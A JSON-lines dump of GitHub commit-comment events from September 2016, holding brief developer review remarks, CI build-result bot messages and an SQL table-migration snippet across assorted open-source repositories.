{"id":"4572377818","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049040,"position":1,"line":558,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:22:34Z","updated_at":"2016-09-16T06:22:34Z","body":"Id: 227051954\r\n"}},"created_at":"2016-09-16T06:22:34Z"}
{"id":"4572378306","type":"CommitCommentEvent","actor":{"login":"CMRemix"},"repo":{"name":"CMRemix/android_device_samsung_trlte-common"},"payload":{"comment":{"id":19049041,"position":null,"line":null,"path":null,"commit_id":"86b48164b7987488df706d36112599b9b58a5f10","created_at":"2016-09-16T06:22:48Z","updated_at":"2016-09-16T06:22:48Z","body":"yes I did face that error. Now I just add custom toolchain support. Thanks"}},"created_at":"2016-09-16T06:22:48Z"}
{"id":"4572379465","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049045,"position":2,"line":559,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:23:18Z","updated_at":"2016-09-16T06:23:18Z","body":"Id: 227051954\r\n"}},"created_at":"2016-09-16T06:23:18Z"}
{"id":"4572380224","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049048,"position":4,"line":561,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:23:37Z","updated_at":"2016-09-16T06:23:37Z","body":"Id: 227051954\r\n"}},"created_at":"2016-09-16T06:23:37Z"}
{"id":"4572380807","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049049,"position":5,"line":561,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:23:51Z","updated_at":"2016-09-16T06:23:51Z","body":"Id: 227051954\r\n"}},"created_at":"2016-09-16T06:23:51Z"}
{"id":"4572381932","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049052,"position":2,"line":559,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:24:17Z","updated_at":"2016-09-16T06:24:17Z","body":"Id: 227051954\r\n"}},"created_at":"2016-09-16T06:24:17Z"}
{"id":"4572382993","type":"CommitCommentEvent","actor":{"login":"Aetles"},"repo":{"name":"olefredrik/FoundationPress"},"payload":{"comment":{"id":19049054,"position":16,"line":16,"path":".babelrc","commit_id":"9e83b23b346675afa5dc0e2a5d34e8b07fd28bc1","created_at":"2016-09-16T06:24:41Z","updated_at":"2016-09-16T06:24:41Z","body":"Ah, right, it's there too. I was just looking at the .babelrc for foundation-sites, forgot about the template. \r\n\r\nI don't know enough about babel, therefore I was curious, I'm trying to understand more. I see that it was introduced to the template in https://github.com/zurb/foundation-zurb-template/commit/85694e713bbbc485c2d4247fdd98b8081204b2ae. (And no, I haven't experimented with the setting myself.)"}},"created_at":"2016-09-16T06:24:41Z"}
{"id":"4572383107","type":"CommitCommentEvent","actor":{"login":"nbehary"},"repo":{"name":"aosp-msm8960/android_device_asus_flo"},"payload":{"comment":{"id":19049055,"position":null,"line":null,"path":null,"commit_id":"f676aef2e5894675cd60357e0d04d279a5ab6a99","created_at":"2016-09-16T06:24:44Z","updated_at":"2016-09-16T06:24:44Z","body":"Good enough answer.  I may look into a better way though."}},"created_at":"2016-09-16T06:24:44Z"}
{"id":"4572386572","type":"CommitCommentEvent","actor":{"login":"smiley325"},"repo":{"name":"smiley325/quantum-elixir"},"payload":{"comment":{"id":19049061,"position":null,"line":null,"path":null,"commit_id":"4da56af2ddf514e0bd906998a356eb66cdc81352","created_at":"2016-09-16T06:26:05Z","updated_at":"2016-09-16T06:26:05Z","body":"@thbar Sorry for long response. But I made this pull request because I was seeing doubled function runs at times (so a task scheduled for every minute would occasionally run twice in a minute). I think it might have to do with the Process.send_after not being exact."}},"created_at":"2016-09-16T06:26:05Z"}
{"id":"4572388261","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19049066,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T06:26:46Z","updated_at":"2016-09-16T06:26:46Z","body":"Ask Tony and Terry. Sorry, I am not going to bite at this. Just very disappointing to see this behavior."}},"created_at":"2016-09-16T06:26:46Z"}
{"id":"4572391487","type":"CommitCommentEvent","actor":{"login":"RVutkevica"},"repo":{"name":"RVutkevica/Tutorial"},"payload":{"comment":{"id":19049076,"position":null,"line":null,"path":null,"commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-16T06:28:02Z","updated_at":"2016-09-16T06:28:02Z","body":"xjbvjdd"}},"created_at":"2016-09-16T06:28:02Z"}
{"id":"4572391578","type":"CommitCommentEvent","actor":{"login":"RVutkevica"},"repo":{"name":"RVutkevica/Tutorial"},"payload":{"comment":{"id":19049077,"position":null,"line":null,"path":null,"commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-16T06:28:05Z","updated_at":"2016-09-16T06:28:05Z","body":"sdfsdfs"}},"created_at":"2016-09-16T06:28:05Z"}
{"id":"4572392294","type":"CommitCommentEvent","actor":{"login":"haiyanwa"},"repo":{"name":"haiyanwa/CS4660-fall-2016"},"payload":{"comment":{"id":19049079,"position":null,"line":null,"path":null,"commit_id":"674dabbad6ea907c6d23c0cc099ad0e7d0e483c3","created_at":"2016-09-16T06:28:20Z","updated_at":"2016-09-16T06:28:20Z","body":"actually second commit before the test run"}},"created_at":"2016-09-16T06:28:20Z"}
{"id":"4572393917","type":"CommitCommentEvent","actor":{"login":"denisprotopopov"},"repo":{"name":"denisprotopopov/pentaho-kettle"},"payload":{"comment":{"id":19049085,"position":null,"line":null,"path":null,"commit_id":"a9622a480a3ce8e297d2c7f469b514c62d5f3732","created_at":"2016-09-16T06:28:56Z","updated_at":"2016-09-16T06:28:56Z","body":"[TEST] fixed failing tests\r\n- fixed expected values\r\n"}},"created_at":"2016-09-16T06:28:56Z"}
{"id":"4572399185","type":"CommitCommentEvent","actor":{"login":"aomoriringo"},"repo":{"name":"aomoriringo/isucon5q_webapp"},"payload":{"comment":{"id":19049140,"position":null,"line":null,"path":null,"commit_id":"11822e844e56234705cdcc3190e7db15c7643c75","created_at":"2016-09-16T06:30:50Z","updated_at":"2016-09-16T06:30:50Z","body":"```\r\nCREATE TABLE fp LIKE footprints;\r\nALTER TABLE fp ADD COLUMN date date NOT NULL, ADD UNIQUE INDEX unique_per_day (user_id,owner_id,date), ADD INDEX user_id (user_id);\r\nREPLACE INTO fp SELECT id, user_id, owner_id, created_at, DATE(created_at) FROM footprints WHERE id <= 500000;\r\nRENAME TABLE footprints TO footprints_old, fp TO footprints;\r\n```"}},"created_at":"2016-09-16T06:30:50Z"}
{"id":"4572399449","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19049141,"position":null,"line":null,"path":null,"commit_id":"bd6f6832bc32129c0473a325a7595c25d035d270","created_at":"2016-09-16T06:30:55Z","updated_at":"2016-09-16T06:30:55Z","body":"Related to: backdrop/backdrop-issues#519 "}},"created_at":"2016-09-16T06:30:55Z"}
{"id":"4572407944","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19049170,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T06:34:07Z","updated_at":"2016-09-16T06:34:07Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2336 tests passed, 1 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T06:34:07Z"}
{"id":"4572413744","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19049188,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T06:36:18Z","updated_at":"2016-09-16T06:36:18Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-16T06:36:18Z"}
{"id":"4572414602","type":"CommitCommentEvent","actor":{"login":"prabhjyotsingh"},"repo":{"name":"apache/zeppelin"},"payload":{"comment":{"id":19049191,"position":34,"line":57,"path":"zeppelin-web/src/app/interpreter/interpreter.controller.js","commit_id":"21a084b170b29dee0f2d57aae22b00c785ef0c8e","created_at":"2016-09-16T06:36:36Z","updated_at":"2016-09-16T06:36:36Z","body":"I too initially thought about `nosOfDeps*n second`, but download time depends on internet speed and size of dependencies and then some of dependencies may require some other/more dependencies (internally). Hence, settled for 2 sec poll. What do you think ?"}},"created_at":"2016-09-16T06:36:36Z"}
{"id":"4572414701","type":"CommitCommentEvent","actor":{"login":"CarzyCode"},"repo":{"name":"CarzyCode/TourTalk"},"payload":{"comment":{"id":19049193,"position":null,"line":null,"path":null,"commit_id":"4ea5a6a73ff31ae3acaf3c146de6310d1166076c","created_at":"2016-09-16T06:36:39Z","updated_at":"2016-09-16T06:36:39Z","body":"as"}},"created_at":"2016-09-16T06:36:39Z"}
{"id":"4572415659","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":19049200,"position":null,"line":null,"path":null,"commit_id":"89b77e07578a1b57964afaf389cc0a1abef73b29","created_at":"2016-09-16T06:36:59Z","updated_at":"2016-09-16T06:36:59Z","body":"Wasn't this already tested somehow?\r\n"}},"created_at":"2016-09-16T06:36:59Z"}
{"id":"4572416597","type":"CommitCommentEvent","actor":{"login":"saddamk206"},"repo":{"name":"JabbR/JabbR"},"payload":{"comment":{"id":19049202,"position":null,"line":null,"path":null,"commit_id":"022672352bbd15b3dc0ab235da6087b4da794c1a","created_at":"2016-09-16T06:37:20Z","updated_at":"2016-09-16T06:37:20Z","body":"getting error while uploading file"}},"created_at":"2016-09-16T06:37:20Z"}
{"id":"4572417628","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19049231,"position":null,"line":null,"path":null,"commit_id":"f2f2c2eaac4a4f254c589095794f1a5dab7f38cb","created_at":"2016-09-16T06:37:43Z","updated_at":"2016-09-16T06:37:43Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T06:37:43Z"}
{"id":"4572418271","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"thecoshman/youareabadlet"},"payload":{"comment":{"id":19049250,"position":10,"line":18,"path":"index.html","commit_id":"8163eac71d953ad6f9f480989ed41dd0ba1952a1","created_at":"2016-09-16T06:37:56Z","updated_at":"2016-09-16T06:37:56Z","body":"That's racist against poles"}},"created_at":"2016-09-16T06:37:56Z"}
{"id":"4572418613","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"BigScary/GriefPrevention"},"payload":{"comment":{"id":19049251,"position":null,"line":null,"path":null,"commit_id":"9e1be73d46b99c59d1be54f14a09ee409e228c65","created_at":"2016-09-16T06:38:03Z","updated_at":"2016-09-16T06:38:03Z","body":"His 15.2.2 version doesn't include this for whatever reason. Likely he pulled the changes after compiling his local changes."}},"created_at":"2016-09-16T06:38:03Z"}
{"id":"4572420641","type":"CommitCommentEvent","actor":{"login":"RVutkevica"},"repo":{"name":"RVutkevica/Tutorial"},"payload":{"comment":{"id":19049254,"position":null,"line":null,"path":null,"commit_id":"f0200f42348939cfb84aa56077fbd308ec9a27cf","created_at":"2016-09-16T06:38:49Z","updated_at":"2016-09-16T06:38:49Z","body":"\r\n![030151079860lg](https://cloud.githubusercontent.com/assets/22165122/18577314/5dca92b8-7bf1-11e6-84a5-b00ed9518a1c.jpg)\r\n"}},"created_at":"2016-09-16T06:38:49Z"}
{"id":"4572423666","type":"CommitCommentEvent","actor":{"login":"davido"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19049265,"position":32,"line":32,"path":"src/com/facebook/buck/util/DefaultPropertyFinder.java","commit_id":"849e68a61002a878f92c6ced219d1089268950c3","created_at":"2016-09-16T06:39:59Z","updated_at":"2016-09-16T06:39:59Z","body":"Why not all occurences of this constant were removed in this commit?"}},"created_at":"2016-09-16T06:39:59Z"}
{"id":"4572424223","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19049270,"position":21,"line":2536,"path":"src/game/Unit.cpp","commit_id":"3ad2fe7e195a2b0d5116251af00ac730601b280b","created_at":"2016-09-16T06:40:13Z","updated_at":"2016-09-16T06:40:13Z","body":"Error spotted! (reminder for me)"}},"created_at":"2016-09-16T06:40:13Z"}
{"id":"4572424458","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19049271,"position":null,"line":null,"path":null,"commit_id":"f2f2c2eaac4a4f254c589095794f1a5dab7f38cb","created_at":"2016-09-16T06:40:19Z","updated_at":"2016-09-16T06:40:19Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T06:40:19Z"}
{"id":"4572426867","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19049281,"position":null,"line":null,"path":null,"commit_id":"24736d11880f5f64d64a3274f1d80cfe51950a47","created_at":"2016-09-16T06:41:12Z","updated_at":"2016-09-16T06:41:12Z","body":"@davidaurelio Really nice work!"}},"created_at":"2016-09-16T06:41:12Z"}
{"id":"4572428430","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19049285,"position":null,"line":null,"path":null,"commit_id":"ad50b2e5df609bb7bb62792e0adefbda3779753c","created_at":"2016-09-16T06:41:48Z","updated_at":"2016-09-16T06:41:48Z","body":"I was thinking about trying the opposite since this looks so bad, yes ;)"}},"created_at":"2016-09-16T06:41:48Z"}
{"id":"4572435691","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"KairusDarkSeeker/SkinStealer"},"payload":{"comment":{"id":19049318,"position":null,"line":null,"path":null,"commit_id":"ad979b4c323a80098598e48a3ff903d9ace22f56","created_at":"2016-09-16T06:44:34Z","updated_at":"2016-09-16T06:44:34Z","body":"please explain furtherly"}},"created_at":"2016-09-16T06:44:34Z"}
{"id":"4572438364","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":19049326,"position":null,"line":null,"path":null,"commit_id":"2a3615e9d0d64b7372f953633e242de47b23a5ca","created_at":"2016-09-16T06:45:31Z","updated_at":"2016-09-16T06:45:31Z","body":"![image](https://cloud.githubusercontent.com/assets/154613/18577425/a1cb325e-7bb7-11e6-92ad-5a322a6bbac4.png)\r\n"}},"created_at":"2016-09-16T06:45:31Z"}
{"id":"4572438758","type":"CommitCommentEvent","actor":{"login":"barthess"},"repo":{"name":"ChibiOS/ChibiOS"},"payload":{"comment":{"id":19049330,"position":null,"line":null,"path":null,"commit_id":"4491129f54af198c7df8507b07e2d3a93581b998","created_at":"2016-09-16T06:45:39Z","updated_at":"2016-09-16T06:45:39Z","body":"I do not know. Best place for your question is official forum. Or you can use diff against patched and original versions."}},"created_at":"2016-09-16T06:45:39Z"}
{"id":"4572440801","type":"CommitCommentEvent","actor":{"login":"achubutkin"},"repo":{"name":"achubutkin/inparametrics.v1.0"},"payload":{"comment":{"id":19049337,"position":58,"line":27,"path":"App_Code/IgClient.cs","commit_id":"44c69f8d40c2e9028491e1182acb047ed8e22134","created_at":"2016-09-16T06:46:24Z","updated_at":"2016-09-16T06:46:24Z","body":"Можно вынести в константу...? "}},"created_at":"2016-09-16T06:46:24Z"}
{"id":"4572440856","type":"CommitCommentEvent","actor":{"login":"codeape2"},"repo":{"name":"codeape2/cppcpa"},"payload":{"comment":{"id":19049338,"position":null,"line":null,"path":null,"commit_id":"11594e9afc9f0d5aba412e96b4db1e66e63c6514","created_at":"2016-09-16T06:46:26Z","updated_at":"2016-09-16T06:46:26Z","body":"Nå ser det bedre ut. Validerer ihht. XSD. check_if_same_ids-skriptet gir heller ingen feil nå.\r\n\r\nSjekker inn ny versjon av validate.linq som ikke laster ned XSDer over nettverket, da skal den funke på din maskin også."}},"created_at":"2016-09-16T06:46:26Z"}
{"id":"4572441154","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19049340,"position":null,"line":null,"path":null,"commit_id":"b9a97ed560c7bba09e07bd36b1bb1abd8b1f8dcc","created_at":"2016-09-16T06:46:32Z","updated_at":"2016-09-16T06:46:32Z","body":"Since you're the main developer it's your call, but I would advise you to use a bit more explicit commit logs to make the git history easier (and more interesting) to read, especially when not on GitHub.\r\n\r\n\"fixes #33\" does not give much information to people who are not on GitHub and able to click the hyperlink to see what the issue was in a new tab.\r\n\r\nOn the other hand, \"Ungrab mouse when leaving the window (fixes #33)\" would be much more readable :)"}},"created_at":"2016-09-16T06:46:32Z"}
{"id":"4572443900","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19049355,"position":null,"line":null,"path":null,"commit_id":"b9a97ed560c7bba09e07bd36b1bb1abd8b1f8dcc","created_at":"2016-09-16T06:47:34Z","updated_at":"2016-09-16T06:47:34Z","body":"Especially since what I suggested as title could only be inferred by reading the code. You might have chosen to fix #33 differently, e.g. by removing mouse grabbing altogether as @IBPX had mentioned."}},"created_at":"2016-09-16T06:47:34Z"}
{"id":"4572448058","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19049366,"position":5,"line":239,"path":"drupal/sites/default/boinc/modules/boincwork/boincwork.admin.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T06:49:04Z","updated_at":"2016-09-16T06:49:04Z","body":"Please omit those comments. We are in the SCM era and that stuff is recorded in the file's history when used properly."}},"created_at":"2016-09-16T06:49:04Z"}
{"id":"4572449544","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19049372,"position":7,"line":40,"path":"drupal/sites/default/boinc/modules/boincwork/includes/boincwork.forms.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T06:49:37Z","updated_at":"2016-09-16T06:49:37Z","body":"These changes are already part of Christian's PR."}},"created_at":"2016-09-16T06:49:37Z"}
{"id":"4572449882","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19049373,"position":8,"line":41,"path":"drupal/sites/default/boinc/modules/boincwork/includes/boincwork.forms.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T06:49:44Z","updated_at":"2016-09-16T06:49:44Z","body":"These changes are already part of Christian's PR."}},"created_at":"2016-09-16T06:49:44Z"}
{"id":"4572451909","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19049376,"position":2,"line":37,"path":"drupal/sites/default/boinc/modules/boincwork/includes/boincwork.forms.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T06:50:25Z","updated_at":"2016-09-16T06:50:25Z","body":"The changes in this file are already part of Christian's PR."}},"created_at":"2016-09-16T06:50:25Z"}
{"id":"4572455491","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19049384,"position":7,"line":768,"path":"drupal/sites/default/boinc/modules/boincwork/includes/boincwork.helpers.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T06:51:41Z","updated_at":"2016-09-16T06:51:41Z","body":"Just curious, what's the reasoning for the format change?"}},"created_at":"2016-09-16T06:51:41Z"}
{"id":"4572457459","type":"CommitCommentEvent","actor":{"login":"DaMichel"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":19049389,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-16T06:52:21Z","updated_at":"2016-09-16T06:52:21Z","body":"I've been messing around trying to remove DX and COM code for testing. The result is a branch in my repo. I thought it might be helpful to you @sthalik "}},"created_at":"2016-09-16T06:52:21Z"}
{"id":"4572458424","type":"CommitCommentEvent","actor":{"login":"steventux"},"repo":{"name":"alphagov/asset-manager"},"payload":{"comment":{"id":19049393,"position":3,"line":2,"path":"config/routes.rb","commit_id":"db255a516ae1357453383b62e692ac06b6d95bd6","created_at":"2016-09-16T06:52:40Z","updated_at":"2016-09-16T06:52:40Z","body":"We should probably follow the standard Rails CRUD routing patterns and make this a `delete` http verb. It's common to route this to a controller action call `destroy`. http://guides.rubyonrails.org/routing.html#crud-verbs-and-actions"}},"created_at":"2016-09-16T06:52:40Z"}
{"id":"4572458620","type":"CommitCommentEvent","actor":{"login":"NicolaeGrigoriu"},"repo":{"name":"easySuite/ding_christmas_calendar"},"payload":{"comment":{"id":19049394,"position":26,"line":27,"path":"ding_christmas_calendar.install","commit_id":"5ee2561fcbe700eb375b12f934a918e9879568ae","created_at":"2016-09-16T06:52:45Z","updated_at":"2016-09-16T06:52:45Z","body":"$node->nid"}},"created_at":"2016-09-16T06:52:45Z"}
{"id":"4572459005","type":"CommitCommentEvent","actor":{"login":"NicolaeGrigoriu"},"repo":{"name":"easySuite/ding_christmas_calendar"},"payload":{"comment":{"id":19049398,"position":2,"line":1,"path":"ding_christmas_calendar.module","commit_id":"5ee2561fcbe700eb375b12f934a918e9879568ae","created_at":"2016-09-16T06:52:52Z","updated_at":"2016-09-16T06:52:52Z","body":"Space"}},"created_at":"2016-09-16T06:52:52Z"}
{"id":"4572460324","type":"CommitCommentEvent","actor":{"login":"NicolaeGrigoriu"},"repo":{"name":"easySuite/ding_christmas_calendar"},"payload":{"comment":{"id":19049400,"position":18,"line":139,"path":"ding_christmas_calendar.module","commit_id":"5ee2561fcbe700eb375b12f934a918e9879568ae","created_at":"2016-09-16T06:53:16Z","updated_at":"2016-09-16T06:53:16Z","body":"Empty line."}},"created_at":"2016-09-16T06:53:16Z"}
{"id":"4572460705","type":"CommitCommentEvent","actor":{"login":"steventux"},"repo":{"name":"alphagov/asset-manager"},"payload":{"comment":{"id":19049402,"position":4,"line":3,"path":"config/routes.rb","commit_id":"db255a516ae1357453383b62e692ac06b6d95bd6","created_at":"2016-09-16T06:53:24Z","updated_at":"2016-09-16T06:53:24Z","body":"We should probably follow the standard Rails CRUD routing patterns and make this a delete http verb. It's common to route this to a controller action call destroy. http://guides.rubyonrails.org/routing.html#crud-verbs-and-actions"}},"created_at":"2016-09-16T06:53:24Z"}
{"id":"4572461027","type":"CommitCommentEvent","actor":{"login":"billnordwall"},"repo":{"name":"leifdalan/vega-june"},"payload":{"comment":{"id":19049404,"position":null,"line":null,"path":null,"commit_id":"ae02537da347fd123aabfbe54c80fc2403a6b267","created_at":"2016-09-16T06:53:30Z","updated_at":"2016-09-16T06:53:30Z","body":"@hasleif where is the test coverage for this change"}},"created_at":"2016-09-16T06:53:30Z"}
{"id":"4572461799","type":"CommitCommentEvent","actor":{"login":"billnordwall"},"repo":{"name":"leifdalan/vega-june"},"payload":{"comment":{"id":19049407,"position":null,"line":null,"path":null,"commit_id":"ae02537da347fd123aabfbe54c80fc2403a6b267","created_at":"2016-09-16T06:53:48Z","updated_at":"2016-09-16T06:53:48Z","body":"will check back in +1 year to verify"}},"created_at":"2016-09-16T06:53:48Z"}
{"id":"4572462086","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":19049409,"position":null,"line":null,"path":null,"commit_id":"89b77e07578a1b57964afaf389cc0a1abef73b29","created_at":"2016-09-16T06:53:54Z","updated_at":"2016-09-16T06:53:54Z","body":"I tried with ONE_PLY in my previous test which failed yellow:\r\nhttp://tests.stockfishchess.org/tests/view/57d0ff2e0ebc59030fbe5068"}},"created_at":"2016-09-16T06:53:54Z"}
{"id":"4572462456","type":"CommitCommentEvent","actor":{"login":"freanux"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19049412,"position":null,"line":null,"path":null,"commit_id":"b9a97ed560c7bba09e07bd36b1bb1abd8b1f8dcc","created_at":"2016-09-16T06:54:02Z","updated_at":"2016-09-16T06:54:02Z","body":"Okay, I changed the commit log entry."}},"created_at":"2016-09-16T06:54:02Z"}
{"id":"4572463045","type":"CommitCommentEvent","actor":{"login":"ardikars"},"repo":{"name":"ardikars/Jxnet"},"payload":{"comment":{"id":19049414,"position":null,"line":null,"path":null,"commit_id":"20987042af73026499d2c30b31d94c11d5b288b8","created_at":"2016-09-16T06:54:14Z","updated_at":"2016-09-16T06:54:14Z","body":"12-09-2016 06:58:27 EDT "}},"created_at":"2016-09-16T06:54:14Z"}
{"id":"4572480335","type":"CommitCommentEvent","actor":{"login":"aloiscochard"},"repo":{"name":"tdroxler/sarsi"},"payload":{"comment":{"id":19049466,"position":35,"line":58,"path":"sarsi.cabal","commit_id":"84c1974ab176f54c92aac94d6b49bf1f505e2b83","created_at":"2016-09-16T07:00:21Z","updated_at":"2016-09-16T07:00:21Z","body":"Stale dependency, right ? "}},"created_at":"2016-09-16T07:00:21Z"}
{"id":"4572482575","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19049481,"position":null,"line":null,"path":null,"commit_id":"b9a97ed560c7bba09e07bd36b1bb1abd8b1f8dcc","created_at":"2016-09-16T07:01:03Z","updated_at":"2016-09-16T07:01:03Z","body":"I didn't mean to rewrite history, just as a tip for future commits. It looks like you rebased to change the commit log, but then merged that new commit on top of the remote, so you now have 3 commits for this change ;)"}},"created_at":"2016-09-16T07:01:03Z"}
